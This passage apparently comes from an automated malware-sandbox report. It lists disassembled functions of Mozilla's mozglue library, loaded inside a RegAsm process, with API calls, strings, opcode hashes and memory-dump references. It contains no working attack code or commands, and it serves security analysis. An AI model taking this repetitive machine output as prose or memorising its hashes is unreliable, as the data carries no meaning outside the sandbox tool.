                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                            • String ID:
                                                                            • API String ID: 112305417-0
                                                                            • Opcode ID: 89edb802102ee76bc44afe8b9f298d2ed4ce44ddf5527cce7c8043b150dd35b1
                                                                            • Instruction ID: b89c7cf48a436d5ee1bb91cefaf3e392a48f23cd081337e61372806747c15651
                                                                            • Opcode Fuzzy Hash: 89edb802102ee76bc44afe8b9f298d2ed4ce44ddf5527cce7c8043b150dd35b1
                                                                            • Instruction Fuzzy Hash: 9651C7727026029BD7119F18D8806AFB772BF9131CF95011ED45A53B00F731F85ACBA2
                                                                            APIs
                                                                            • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D32
                                                                            • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D62
                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D6D
                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95D84
                                                                            • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95DA4
                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95DC9
                                                                            • std::_Facet_Register.LIBCPMT ref: 6CC95DDB
                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95E00
                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CC95C8C,?,6CC6E829), ref: 6CC95E45
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                            • String ID:
                                                                            • API String ID: 2325513730-0
                                                                            • Opcode ID: 5cfedafd0c29329e258b3d6cc9f8e16e7e071290dbc790c8e474f7bf375af258
                                                                            • Instruction ID: fb7876f300e37f58bd7c90a59601ddad3c929e030b0e8c0298208de06f187c6d
                                                                            • Opcode Fuzzy Hash: 5cfedafd0c29329e258b3d6cc9f8e16e7e071290dbc790c8e474f7bf375af258
                                                                            • Instruction Fuzzy Hash: 5941C2757002058FCB00DFA5C9D8AAE77B5FF89319F0441A8E50697791EB35EC06CB60
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CC331A7), ref: 6CC6CDDD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                            • API String ID: 4275171209-2186867486
                                                                            • Opcode ID: 3b1509cdb8a27fc19319f1ec38b160d3553e756fc0d96ecbb2baaf9136e9b9d6
                                                                            • Instruction ID: 7986fe24accd01d142f8e5c75f5376e31a01c2699bf7f5f4bf737bb9bf9e6cb9
                                                                            • Opcode Fuzzy Hash: 3b1509cdb8a27fc19319f1ec38b160d3553e756fc0d96ecbb2baaf9136e9b9d6
                                                                            • Instruction Fuzzy Hash: 4431A331B442055BEF10AFEA8DD5B6E7B75BF41B58F204019F610ABE80FB70E4018BA5
                                                                            APIs
                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC3BC03
                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC3BD06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                            • String ID: 0$0$y
                                                                            • API String ID: 2811501404-3020536412
                                                                            APIs
                                                                              • Part of subcall function 6CC3F100: LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                              • Part of subcall function 6CC3F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                            • moz_xmalloc.MOZGLUE(00000012), ref: 6CC3ED50
                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC3EDAC
                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CC3EDCC
                                                                            • CreateFileW.KERNEL32 ref: 6CC3EE08
                                                                            • free.MOZGLUE(00000000), ref: 6CC3EE27
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CC3EE32
                                                                              • Part of subcall function 6CC3EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CC3EBB5
                                                                              • Part of subcall function 6CC3EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CC6D7F3), ref: 6CC3EBC3
                                                                              • Part of subcall function 6CC3EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CC6D7F3), ref: 6CC3EBD6
                                                                            Strings
                                                                            • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CC3EDC1
                                                                            Similarity
                                                                            • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                            • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                            • API String ID: 1980384892-344433685
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(0000000C,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40A72
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • moz_xmalloc.MOZGLUE(?,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40AF5
                                                                            • free.MOZGLUE(00000000,?,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40B9F
                                                                            • free.MOZGLUE(?,?,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40BDB
                                                                            • free.MOZGLUE(00000000,?,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40BED
                                                                            • mozalloc_abort.MOZGLUE(alloc overflow,?,6CC9B80C,00000000,?,?,6CC4003B,?), ref: 6CC40C0A
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: free$moz_xmalloc$mallocmozalloc_abort
                                                                            • String ID: alloc overflow
                                                                            • API String ID: 1471638834-749304246
                                                                            APIs
                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCAA565
                                                                              • Part of subcall function 6CCAA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCAA4BE
                                                                              • Part of subcall function 6CCAA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CCAA4D6
                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CCAA65B
                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CCAA6B6
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                            • String ID: 0$z
                                                                            • API String ID: 310210123-2584888582
                                                                            APIs
                                                                            • free.MOZGLUE(?,6CCB008B), ref: 6CC37B89
                                                                            • free.MOZGLUE(?,6CCB008B), ref: 6CC37BAC
                                                                              • Part of subcall function 6CC378C0: free.MOZGLUE(?,6CCB008B), ref: 6CC37BCF
                                                                            • free.MOZGLUE(?,6CCB008B), ref: 6CC37BF2
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            Similarity
                                                                            • API ID: free$CriticalSection$EnterLeavememset
                                                                            • String ID:
                                                                            • API String ID: 3977402767-0
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            Strings
                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC79459
                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC7946B
                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC7947D
                                                                            Similarity
                                                                            • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                            • API String ID: 4042361484-1628757462
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8124B
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC81268
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC812DA
                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC8134A
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CC8138A
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CC81431
                                                                              • Part of subcall function 6CC78AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78BD5
                                                                            • free.MOZGLUE(?), ref: 6CC8145A
                                                                            • free.MOZGLUE(?), ref: 6CC8146C
                                                                            Similarity
                                                                            • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                            • String ID:
                                                                            • API String ID: 2803333873-0
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC80F6B
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC80F88
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC80FF7
                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC81067
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CC810A7
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CC8114B
                                                                              • Part of subcall function 6CC78AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78BD5
                                                                            • free.MOZGLUE(?), ref: 6CC81174
                                                                            • free.MOZGLUE(?), ref: 6CC81186
                                                                            Similarity
                                                                            • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                            • String ID:
                                                                            • API String ID: 2803333873-0
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(?,?,?,6CC41999), ref: 6CC3EA39
                                                                            • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6CC3EA5C
                                                                            • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6CC3EA76
                                                                            • moz_xmalloc.MOZGLUE(-00000001,?,?,6CC41999), ref: 6CC3EA9D
                                                                            • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6CC41999), ref: 6CC3EAC2
                                                                            • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6CC3EADC
                                                                            • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6CC3EB0B
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6CC3EB27
                                                                            Similarity
                                                                            • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                            • String ID:
                                                                            • API String ID: 706364981-0
                                                                            • Opcode ID: 96ef0822f53e501e32504048c77324650007e9c4cdad27e8a0987a03a6821992
                                                                            • Instruction ID: b9313526c5eeeff951eeeb50a0357a6673782edaa038a4f8b279caa98240f4cf
                                                                            • Opcode Fuzzy Hash: 96ef0822f53e501e32504048c77324650007e9c4cdad27e8a0987a03a6821992
                                                                            • Instruction Fuzzy Hash: 594193B1A002269FDB14CFA8DC80AAE7BA4FF45358F240628E819D7794F731DD4587D5
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6AC
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6D1
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6E3
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B70B
                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B71D
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CC3B61E), ref: 6CC3B73F
                                                                            • moz_xmalloc.MOZGLUE(80000023,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B760
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B79A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                            • String ID:
                                                                            • API String ID: 1394714614-0
                                                                            • Opcode ID: 51544dc9f21d85414a50ff5d69228bc5f52bae0b60e8556c42af2da1aae39e42
                                                                            • Instruction ID: 297e0ebdf178e551a262bbd8912b0ef863c13781515873c65bef4c66bd142892
                                                                            • Opcode Fuzzy Hash: 51544dc9f21d85414a50ff5d69228bc5f52bae0b60e8556c42af2da1aae39e42
                                                                            • Instruction Fuzzy Hash: 7941E3B2D005259FCB04DF68EC945AEB7B5FB45320F250629E829E7780F731A9048BE1
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(6CCB5104), ref: 6CC3EFAC
                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC3EFD7
                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC3EFEC
                                                                            • free.MOZGLUE(?), ref: 6CC3F00C
                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC3F02E
                                                                            • memcpy.VCRUNTIME140(00000000,?), ref: 6CC3F041
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC3F065
                                                                            • moz_xmalloc.MOZGLUE ref: 6CC3F072
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                            • String ID:
                                                                            • API String ID: 1148890222-0
                                                                            • Opcode ID: 9425729af7d86e4f4a491fdbe31271777e00212789c18322d2fd1f8f387815f3
                                                                            • Instruction ID: e20aef7dbec717949eaf4c7e65986a924002eef227032a9315ff1c521ff2d74e
                                                                            • Opcode Fuzzy Hash: 9425729af7d86e4f4a491fdbe31271777e00212789c18322d2fd1f8f387815f3
                                                                            • Instruction Fuzzy Hash: 0041D9B1A001169FCB08CF68EC809AE7765FF88314B24466CE81AD7794FB75E915C7E1
                                                                            APIs
                                                                            • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CCAB5B9
                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CCAB5C5
                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CCAB5DA
                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CCAB5F4
                                                                            • __Init_thread_footer.LIBCMT ref: 6CCAB605
                                                                            • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CCAB61F
                                                                            • std::_Facet_Register.LIBCPMT ref: 6CCAB631
                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCAB655
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                            • String ID:
                                                                            • API String ID: 1276798925-0
                                                                            • Opcode ID: d6fc7ce9e986f3d2a4060040e041f359518c70ffacd4c9817143981d748e8850
                                                                            • Instruction ID: 913224d398ae304cd8a06d744b8b942bfc86cdbe9b2fc2313d0dbbd9c068a89a
                                                                            • Opcode Fuzzy Hash: d6fc7ce9e986f3d2a4060040e041f359518c70ffacd4c9817143981d748e8850
                                                                            • Instruction Fuzzy Hash: 3531B379B00205CFCB00DFF9C8A89AEB7B5FF8A324B150599D90297740EB34A807CB95
                                                                            APIs
                                                                            • free.MOZGLUE(?,?,?,6CC97ABE), ref: 6CC4985B
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6CC97ABE), ref: 6CC498A8
                                                                            • moz_xmalloc.MOZGLUE(00000020), ref: 6CC49909
                                                                            • memcpy.VCRUNTIME140(00000023,?,?), ref: 6CC49918
                                                                            • free.MOZGLUE(?), ref: 6CC49975
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 1281542009-0
                                                                            • Opcode ID: 0764e775a210bb2d539650b1298f21c246cbe7a57411dac5fa46b3089065f3c7
                                                                            • Instruction ID: 0abbb1056453f3e8e5dd87810baab3b36d638fe6d94386d0e887b349c37078c2
                                                                            • Opcode Fuzzy Hash: 0764e775a210bb2d539650b1298f21c246cbe7a57411dac5fa46b3089065f3c7
                                                                            • Instruction Fuzzy Hash: 6B719C746007158FC725CF28C580956B7F5FF4A324B248AADE85A8BBA0E771F845CB50
                                                                            APIs
                                                                            • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B7E6
                                                                            • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B80C
                                                                            • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE), ref: 6CC4B88E
                                                                            • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B896
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                            • String ID:
                                                                            • API String ID: 922945588-0
                                                                            • Opcode ID: bcdd91ffc4d637c9301c608326139dc0e72ea955073c86225b9fe72161bbf8dc
                                                                            • Instruction ID: b38f9e6e4200ff579972aa192a45d391532718b6047f1fa906ce11a3bd42811f
                                                                            • Opcode Fuzzy Hash: bcdd91ffc4d637c9301c608326139dc0e72ea955073c86225b9fe72161bbf8dc
                                                                            • Instruction Fuzzy Hash: FF516B35700A048FDB25CF59C4A4A6EBBF5FF89318B69C95DE98A87351D731E802CB80
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74B48
                                                                            • free.MOZGLUE(?,?,?,80000000,?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74B7F
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74B94
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74BBC
                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74BEE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
